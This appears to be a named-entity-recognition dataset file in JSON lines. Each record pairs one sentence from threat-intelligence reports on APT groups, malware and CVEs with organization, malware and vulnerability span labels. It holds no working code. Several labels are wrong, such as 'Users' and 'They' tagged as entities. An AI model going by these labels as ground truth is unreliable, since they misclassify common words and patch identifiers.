{"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team .", "spans": {"Organization: Symantec": [[38, 46]]}, "info": {"id": "dnrti_valid_000366", "source": "dnrti_valid"}}
{"text": "In addition , OceanLotus is also known to use ‘watering hole attacks’ , which involve the compromise of a website that the victim is likely to visit .", "spans": {}, "info": {"id": "dnrti_valid_000367", "source": "dnrti_valid"}}
{"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000368", "source": "dnrti_valid"}}
{"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000369", "source": "dnrti_valid"}}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries .", "spans": {"Organization: Dragos": [[0, 6]]}, "info": {"id": "dnrti_valid_000370", "source": "dnrti_valid"}}
{"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000371", "source": "dnrti_valid"}}
{"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan .", "spans": {"Organization: Kaspersky": [[42, 51]], "Organization: government": [[118, 128]]}, "info": {"id": "dnrti_valid_000372", "source": "dnrti_valid"}}
{"text": "Kaspersky also published details on how Zebrocy has added the Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000373", "source": "dnrti_valid"}}
{"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000374", "source": "dnrti_valid"}}
{"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories .", "spans": {"Organization: ESET": [[102, 106]]}, "info": {"id": "dnrti_valid_000375", "source": "dnrti_valid"}}
{"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy” , to the LuckyMouse APT group (aka EmissaryPanda and APT27) .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000376", "source": "dnrti_valid"}}
{"text": "Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": {"Organization: Kaspersky": [[57, 66]], "Organization: Apple customers": [[229, 244]]}, "info": {"id": "dnrti_valid_000377", "source": "dnrti_valid"}}
{"text": "In this blog post , FireEye researchers are going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41 .", "spans": {"Organization: FireEye": [[20, 27], [85, 92]]}, "info": {"id": "dnrti_valid_000379", "source": "dnrti_valid"}}
{"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations .", "spans": {"Vulnerability: (CVE-2018-0802)": [[62, 77]]}, "info": {"id": "dnrti_valid_000380", "source": "dnrti_valid"}}
{"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor .", "spans": {}, "info": {"id": "dnrti_valid_000381", "source": "dnrti_valid"}}
{"text": "There have been reports of real-time phishing in the wild as early as 2010 .", "spans": {}, "info": {"id": "dnrti_valid_000382", "source": "dnrti_valid"}}
{"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool – named ReelPhish – that simplifies the real-time phishing technique .", "spans": {}, "info": {"id": "dnrti_valid_000383", "source": "dnrti_valid"}}
{"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests .", "spans": {}, "info": {"id": "dnrti_valid_000384", "source": "dnrti_valid"}}
{"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States .", "spans": {"Organization: private firms": [[179, 192]]}, "info": {"id": "dnrti_valid_000385", "source": "dnrti_valid"}}
{"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism .", "spans": {"Organization: Mandiant": [[31, 39]]}, "info": {"id": "dnrti_valid_000386", "source": "dnrti_valid"}}
{"text": "The group has also been reported as Leviathanby other security firms .", "spans": {"Organization: Leviathanby": [[36, 47]]}, "info": {"id": "dnrti_valid_000387", "source": "dnrti_valid"}}
{"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit .", "spans": {}, "info": {"id": "dnrti_valid_000388", "source": "dnrti_valid"}}
{"text": "The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal .", "spans": {}, "info": {"id": "dnrti_valid_000389", "source": "dnrti_valid"}}
{"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration .", "spans": {}, "info": {"id": "dnrti_valid_000390", "source": "dnrti_valid"}}
{"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors .", "spans": {}, "info": {"id": "dnrti_valid_000391", "source": "dnrti_valid"}}
{"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network environments .", "spans": {}, "info": {"id": "dnrti_valid_000392", "source": "dnrti_valid"}}
{"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China .", "spans": {"Organization: FireEye": [[86, 93]]}, "info": {"id": "dnrti_valid_000393", "source": "dnrti_valid"}}
{"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations .", "spans": {"Organization: North Korean government": [[156, 179]]}, "info": {"id": "dnrti_valid_000394", "source": "dnrti_valid"}}
{"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign .", "spans": {}, "info": {"id": "dnrti_valid_000395", "source": "dnrti_valid"}}
{"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India .", "spans": {}, "info": {"id": "dnrti_valid_000397", "source": "dnrti_valid"}}
{"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2017-10271": [[79, 93]]}, "info": {"id": "dnrti_valid_000401", "source": "dnrti_valid"}}
{"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"Organization: Users": [[0, 5]]}, "info": {"id": "dnrti_valid_000402", "source": "dnrti_valid"}}
{"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh Londhe , Dileep .", "spans": {"Organization: Yogesh Londhe": [[67, 80]], "Organization: Dileep": [[83, 89]]}, "info": {"id": "dnrti_valid_000403", "source": "dnrti_valid"}}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": {"Vulnerability: EternalBlue": [[218, 229]]}, "info": {"id": "dnrti_valid_000404", "source": "dnrti_valid"}}
{"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server .", "spans": {}, "info": {"id": "dnrti_valid_000406", "source": "dnrti_valid"}}
{"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits .", "spans": {}, "info": {"id": "dnrti_valid_000407", "source": "dnrti_valid"}}
{"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors .", "spans": {}, "info": {"id": "dnrti_valid_000409", "source": "dnrti_valid"}}
{"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": {"Vulnerability: zero-day": [[54, 62]]}, "info": {"id": "dnrti_valid_000410", "source": "dnrti_valid"}}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base .", "spans": {"Organization: South Korean government": [[71, 94]]}, "info": {"id": "dnrti_valid_000411", "source": "dnrti_valid"}}
{"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets .", "spans": {}, "info": {"id": "dnrti_valid_000412", "source": "dnrti_valid"}}
{"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY .", "spans": {"Organization: FireEye iSIGHT": [[19, 33]]}, "info": {"id": "dnrti_valid_000413", "source": "dnrti_valid"}}
{"text": "FireEye products have robust detection for the malware used in this campaign .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000415", "source": "dnrti_valid"}}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"Organization: engineering firms": [[157, 174]], "Organization: government": [[233, 243]], "Organization: research universities": [[258, 279]]}, "info": {"id": "dnrti_valid_000416", "source": "dnrti_valid"}}
{"text": "Infection VectorWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails .", "spans": {}, "info": {"id": "dnrti_valid_000418", "source": "dnrti_valid"}}
{"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": {"Vulnerability: CVE-2017-8759": [[49, 62]]}, "info": {"id": "dnrti_valid_000420", "source": "dnrti_valid"}}
{"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": {"Vulnerability: vulnerability": [[5, 18]], "Organization: FireEye": [[37, 44]]}, "info": {"id": "dnrti_valid_000421", "source": "dnrti_valid"}}
{"text": "We have observed this recent wave of Zyklon malware being delivered primarily through spam emails .", "spans": {}, "info": {"id": "dnrti_valid_000422", "source": "dnrti_valid"}}
{"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office .", "spans": {"Vulnerability: CVE-2017-11882": [[37, 51]], "Vulnerability: (CVE-2017-11882)": [[146, 162]]}, "info": {"id": "dnrti_valid_000424", "source": "dnrti_valid"}}
{"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 .", "spans": {}, "info": {"id": "dnrti_valid_000425", "source": "dnrti_valid"}}
{"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network .", "spans": {}, "info": {"id": "dnrti_valid_000426", "source": "dnrti_valid"}}
{"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat .", "spans": {"Organization: FireEye": [[26, 33]]}, "info": {"id": "dnrti_valid_000427", "source": "dnrti_valid"}}
{"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. , and Israeli nation state actors .", "spans": {"Organization: critical infrastructure": [[17, 40]]}, "info": {"id": "dnrti_valid_000428", "source": "dnrti_valid"}}
{"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences .", "spans": {}, "info": {"id": "dnrti_valid_000429", "source": "dnrti_valid"}}
{"text": "First , the attacker’s mission is to disrupt an operational process rather than steal data .", "spans": {}, "info": {"id": "dnrti_valid_000430", "source": "dnrti_valid"}}
{"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers .", "spans": {}, "info": {"id": "dnrti_valid_000431", "source": "dnrti_valid"}}
{"text": "the attacker did not leverage all of TRITON’s extensive reconnaissance capabilities .", "spans": {}, "info": {"id": "dnrti_valid_000432", "source": "dnrti_valid"}}
{"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption .", "spans": {}, "info": {"id": "dnrti_valid_000434", "source": "dnrti_valid"}}
{"text": "The TRITON sample Mandiant analyzed added an attacker-provided program to the execution table of the Triconex controller .", "spans": {"Organization: Mandiant": [[18, 26]]}, "info": {"id": "dnrti_valid_000435", "source": "dnrti_valid"}}
{"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller .", "spans": {}, "info": {"id": "dnrti_valid_000437", "source": "dnrti_valid"}}
{"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali .", "spans": {"Organization: ICS Security": [[161, 173]]}, "info": {"id": "dnrti_valid_000438", "source": "dnrti_valid"}}
{"text": "Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"Organization: additional users": [[188, 204]]}, "info": {"id": "dnrti_valid_000440", "source": "dnrti_valid"}}
{"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites .", "spans": {}, "info": {"id": "dnrti_valid_000441", "source": "dnrti_valid"}}
{"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish .", "spans": {}, "info": {"id": "dnrti_valid_000443", "source": "dnrti_valid"}}
{"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure – both 1dnscontrol.com and the legitimate websites containing the rogue code – were taken offline .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000444", "source": "dnrti_valid"}}
{"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000446", "source": "dnrti_valid"}}
{"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers .", "spans": {"Organization: FireEye": [[24, 31]], "Organization: BACKSWING v1": [[89, 101]], "Organization: BACKSWING": [[158, 167]]}, "info": {"id": "dnrti_valid_000448", "source": "dnrti_valid"}}
{"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000449", "source": "dnrti_valid"}}
{"text": "The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers .", "spans": {"Malware: DanBot": [[78, 84]], "Organization: CTU": [[105, 108]]}, "info": {"id": "dnrti_valid_000455", "source": "dnrti_valid"}}
{"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 .", "spans": {"Malware: Previous versions": [[0, 17]], "Organization: Kaspersky": [[36, 45]]}, "info": {"id": "dnrti_valid_000456", "source": "dnrti_valid"}}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server .", "spans": {"Malware: GoogleUpdate.exe": [[4, 20]]}, "info": {"id": "dnrti_valid_000457", "source": "dnrti_valid"}}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries .", "spans": {"Malware: malware": [[15, 22]]}, "info": {"id": "dnrti_valid_000458", "source": "dnrti_valid"}}
{"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage .", "spans": {"Malware: They": [[0, 4]]}, "info": {"id": "dnrti_valid_000459", "source": "dnrti_valid"}}
{"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system .", "spans": {"Malware: document files": [[106, 120]]}, "info": {"id": "dnrti_valid_000460", "source": "dnrti_valid"}}
{"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers .", "spans": {"Malware: Backdoor": [[0, 8]]}, "info": {"id": "dnrti_valid_000461", "source": "dnrti_valid"}}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format .", "spans": {"Malware: email stealer": [[4, 17]]}, "info": {"id": "dnrti_valid_000462", "source": "dnrti_valid"}}
{"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"Malware: malicious payload": [[72, 89]], "Organization: users": [[154, 159]]}, "info": {"id": "dnrti_valid_000463", "source": "dnrti_valid"}}
{"text": "Group-IB has also detected recon emails sent out to New Zealand .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: recon emails": [[27, 39]]}, "info": {"id": "dnrti_valid_000464", "source": "dnrti_valid"}}
{"text": "In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": {"Organization: Group-IB": [[10, 18]], "Malware: Ivoke": [[84, 89]]}, "info": {"id": "dnrti_valid_000465", "source": "dnrti_valid"}}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]]}, "info": {"id": "dnrti_valid_000466", "source": "dnrti_valid"}}
{"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: malicious Microsoft Word attachment": [[70, 105]]}, "info": {"id": "dnrti_valid_000467", "source": "dnrti_valid"}}
{"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka .", "spans": {"Malware: Silence.ProxyBot": [[19, 35]]}, "info": {"id": "dnrti_valid_000468", "source": "dnrti_valid"}}
{"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank .", "spans": {"Malware: xfs-disp.exe": [[166, 178]]}, "info": {"id": "dnrti_valid_000469", "source": "dnrti_valid"}}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine .", "spans": {"Malware: Silence.Downloader": [[17, 35]]}, "info": {"id": "dnrti_valid_000470", "source": "dnrti_valid"}}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server .", "spans": {"Malware: Silence.MainModule": [[0, 18]]}, "info": {"id": "dnrti_valid_000471", "source": "dnrti_valid"}}
{"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe .", "spans": {"Organization: Rapid7": [[0, 6]], "Malware: ccSEUPDT.exe": [[52, 64]]}, "info": {"id": "dnrti_valid_000472", "source": "dnrti_valid"}}
{"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations .", "spans": {"Malware: malware": [[6, 13]]}, "info": {"id": "dnrti_valid_000473", "source": "dnrti_valid"}}
{"text": "The samples we analyzed originated from the Philippines .", "spans": {"Malware: samples": [[4, 11]]}, "info": {"id": "dnrti_valid_000474", "source": "dnrti_valid"}}
{"text": "Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date .", "spans": {"Malware: sample": [[46, 52]]}, "info": {"id": "dnrti_valid_000475", "source": "dnrti_valid"}}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more .", "spans": {"Malware: PlugX": [[0, 5]]}, "info": {"id": "dnrti_valid_000476", "source": "dnrti_valid"}}
{"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution .", "spans": {"Malware: TONEDEAF": [[0, 8]]}, "info": {"id": "dnrti_valid_000477", "source": "dnrti_valid"}}
{"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH .", "spans": {"Organization: FireEye": [[10, 17]], "Malware: VALUEVAULT": [[89, 99]], "Malware: LONGWATCH": [[104, 113]]}, "info": {"id": "dnrti_valid_000478", "source": "dnrti_valid"}}
{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file .", "spans": {"Malware: PICKPOCKET": [[0, 10]]}, "info": {"id": "dnrti_valid_000479", "source": "dnrti_valid"}}
{"text": "FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: TONEDEAF": [[83, 91]], "Malware: VALUEVAULT": [[94, 104]], "Malware: LONGWATCH": [[111, 120]]}, "info": {"id": "dnrti_valid_000480", "source": "dnrti_valid"}}
{"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents .", "spans": {"Malware: spearphishing emails": [[230, 250]]}, "info": {"id": "dnrti_valid_000481", "source": "dnrti_valid"}}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network (etool.exe) , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) .", "spans": {"Vulnerability: CVE-2017-0144": [[152, 165]], "Malware: MS07-010": [[191, 199]], "Malware: PsExec": [[299, 305]]}, "info": {"id": "dnrti_valid_000482", "source": "dnrti_valid"}}
{"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper .", "spans": {"Malware: stylecss.aspx": [[68, 81]], "Malware: China Chopper": [[153, 166]]}, "info": {"id": "dnrti_valid_000483", "source": "dnrti_valid"}}
{"text": "We will provide an analysis of the HyperBro tool in an upcoming section .", "spans": {"Organization: We": [[0, 2]], "Malware: HyperBro": [[35, 43]]}, "info": {"id": "dnrti_valid_000484", "source": "dnrti_valid"}}
{"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": {"Malware: PYTHON33.dll": [[45, 57]], "Malware: inicore_v2.3.30.dll": [[70, 89]]}, "info": {"id": "dnrti_valid_000485", "source": "dnrti_valid"}}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell .", "spans": {"Vulnerability: CVE-2017-0144": [[132, 145]], "Malware: errr.aspx": [[194, 203]]}, "info": {"id": "dnrti_valid_000486", "source": "dnrti_valid"}}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 .", "spans": {"Vulnerability: CVE-2017-0144": [[109, 122]], "Malware: MS17-010": [[162, 170]]}, "info": {"id": "dnrti_valid_000487", "source": "dnrti_valid"}}
{"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation .", "spans": {"Malware: GRIFFON": [[35, 42]]}, "info": {"id": "dnrti_valid_000488", "source": "dnrti_valid"}}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method .", "spans": {"Malware: GRIFFON": [[8, 15]]}, "info": {"id": "dnrti_valid_000489", "source": "dnrti_valid"}}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger .", "spans": {"Malware: AveMaria": [[10, 18]]}, "info": {"id": "dnrti_valid_000490", "source": "dnrti_valid"}}
{"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT .", "spans": {"Malware: Monitor RAT": [[37, 48]], "Malware: LuminosityLink RAT": [[116, 134]], "Malware: NetWire RAT": [[137, 148]], "Malware: NjRAT": [[155, 160]]}, "info": {"id": "dnrti_valid_000491", "source": "dnrti_valid"}}
{"text": "In a case in June 2019 , we also noticed Warzone RAT being used .", "spans": {"Malware: Warzone RAT": [[41, 52]]}, "info": {"id": "dnrti_valid_000492", "source": "dnrti_valid"}}
{"text": "Xpert RAT reportedly first appeared in 2011 .", "spans": {"Malware: Xpert RAT": [[0, 9]]}, "info": {"id": "dnrti_valid_000493", "source": "dnrti_valid"}}
{"text": "The first version of Proyecto RAT” was published at the end of 2010 .", "spans": {"Malware: Proyecto RAT”": [[21, 34]]}, "info": {"id": "dnrti_valid_000494", "source": "dnrti_valid"}}
{"text": "Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar .", "spans": {"Malware: JAR": [[36, 39]]}, "info": {"id": "dnrti_valid_000495", "source": "dnrti_valid"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"Malware: slides": [[33, 39]], "Vulnerability: CVE-2017-8759": [[64, 77]]}, "info": {"id": "dnrti_valid_000496", "source": "dnrti_valid"}}
{"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware .", "spans": {"Malware: ServHelper": [[66, 76]]}, "info": {"id": "dnrti_valid_000497", "source": "dnrti_valid"}}
{"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines .", "spans": {"Malware: spam emails": [[20, 31]]}, "info": {"id": "dnrti_valid_000498", "source": "dnrti_valid"}}
{"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security .", "spans": {"Vulnerability: CVE-2019-0604": [[75, 88]], "Organization: Cyber Security Center": [[141, 162]], "Organization: Canadian Center": [[171, 186]]}, "info": {"id": "dnrti_valid_000499", "source": "dnrti_valid"}}
{"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell .", "spans": {"Vulnerability: CVE-2019-0604": [[66, 79]]}, "info": {"id": "dnrti_valid_000500", "source": "dnrti_valid"}}
{"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 .", "spans": {"Vulnerability: CVE-2019-0604": [[264, 277]]}, "info": {"id": "dnrti_valid_000502", "source": "dnrti_valid"}}
{"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT .", "spans": {"Vulnerability: CVE-2017-11882": [[189, 203]]}, "info": {"id": "dnrti_valid_000505", "source": "dnrti_valid"}}
{"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills. total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks .", "spans": {"Vulnerability: phishing": [[228, 236]]}, "info": {"id": "dnrti_valid_000506", "source": "dnrti_valid"}}
{"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability .", "spans": {"Vulnerability: CVE-2018-8174": [[81, 94]]}, "info": {"id": "dnrti_valid_000507", "source": "dnrti_valid"}}
{"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April .", "spans": {"Vulnerability: CVE-2019-0752": [[25, 38]], "Organization: Trend Micro’s": [[90, 103]]}, "info": {"id": "dnrti_valid_000508", "source": "dnrti_valid"}}
{"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 .", "spans": {"Vulnerability: CVE-2018-8174": [[99, 112]], "Vulnerability: CVE-2019-0752": [[116, 129]]}, "info": {"id": "dnrti_valid_000509", "source": "dnrti_valid"}}
{"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution .", "spans": {"Vulnerability: CVE-2017-11882": [[109, 123]]}, "info": {"id": "dnrti_valid_000510", "source": "dnrti_valid"}}
{"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits .", "spans": {"Vulnerability: 0day exploits": [[132, 145]]}, "info": {"id": "dnrti_valid_000512", "source": "dnrti_valid"}}
